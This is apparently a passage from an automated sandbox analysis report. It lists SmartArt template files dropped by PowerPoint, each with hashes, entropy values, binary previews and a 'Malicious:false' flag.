                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4888
                                                                                                                              Entropy (8bit):7.8636569313247335
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                              MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                              SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                              SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                              SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):260
                                                                                                                              Entropy (8bit):3.494357416502254
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                                                                                                              MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                                                                                              SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                                                                                              SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                                                                                              SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6193
                                                                                                                              Entropy (8bit):7.855499268199703
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                              MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                              SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                              SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                              SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):260
                                                                                                                              Entropy (8bit):3.4895685222798054
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                                                                                              MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                                                                                              SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                                                                                              SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                                                                                              SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3075
                                                                                                                              Entropy (8bit):7.716021191059687
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                              MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                              SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                              SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                              SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):238
                                                                                                                              Entropy (8bit):3.472155835869843
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                                                                                              MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                                                                                              SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                                                                                              SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                                                                                              SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5151
                                                                                                                              Entropy (8bit):7.859615916913808
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                              MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                              SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                              SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                              SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):286
                                                                                                                              Entropy (8bit):3.4670546921349774
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUX0XPYDxUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPYDCloGHmD0+dAH/luWvv
                                                                                                                              MD5:3D52060B74D7D448DC733FFE5B92CB52
                                                                                                                              SHA1:3FBA3FFC315DB5B70BF6F05C4FF84B52A50FCCBC
                                                                                                                              SHA-256:BB980559C6FC38B703D1E9C41720D5CE8D00D2FF86D4F25136DB02B1E54B1518
                                                                                                                              SHA-512:952EF139A72562A528C1052F1942DAE1C0509D67654BF5E7C0602C87F90147E8EE9E251D2632BCB5B511AB2FF8A3734293D0A4E3DBD3D187F5E3C042685F9A0C
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.l.t.e.r.n.a.t.i.n.g.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):5630
                                                                                                                              Entropy (8bit):7.87271654296772
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                              MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                              SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                              SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                              SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):264
                                                                                                                              Entropy (8bit):3.4866056878458096
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUX0XrZUloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXWloGHmD0+dAH/luWvv
                                                                                                                              MD5:6C489D45F3B56845E68BE07EA804C698
                                                                                                                              SHA1:C4C9012C0159770CB882870D4C92C307126CEC3F
                                                                                                                              SHA-256:3FE447260CDCDEE287B8D01CF5F9F53738BFD6AAEC9FB9787F2826F8DEF1CA45
                                                                                                                              SHA-512:D1355C48A09E7317773E4F1613C4613B7EA42D21F5A6692031D288D69D47B19E8F4D5A29AFD8B751B353FC7DE865EAE7CFE3F0BEC05F33DDF79526D64A29EB18
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6448
                                                                                                                              Entropy (8bit):7.897260397307811
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                              MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                              SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                              SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                              SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):254
                                                                                                                              Entropy (8bit):3.4845992218379616
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                                                                                              MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                                                                                              SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                                                                                              SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                                                                                              SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):6024
                                                                                                                              Entropy (8bit):7.886254023824049
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                              MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                              SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                              SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                              SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):256
                                                                                                                              Entropy (8bit):3.4842773155694724
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                                                                                              MD5:923D406B2170497AD4832F0AD3403168
                                                                                                                              SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                                                                                              SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                                                                                              SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                                                                                              Malicious:false
                                                                                                                              Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):11380
                                                                                                                              Entropy (8bit):7.891971054886943
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                              MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                              SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                              SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                              SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                              Malicious:false
                                                                                                                              Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:Microsoft OOXML
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):486596
                                                                                                                              Entropy (8bit):7.668294441507828
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                              MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                              SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                              SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                              SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                              Malicious:false
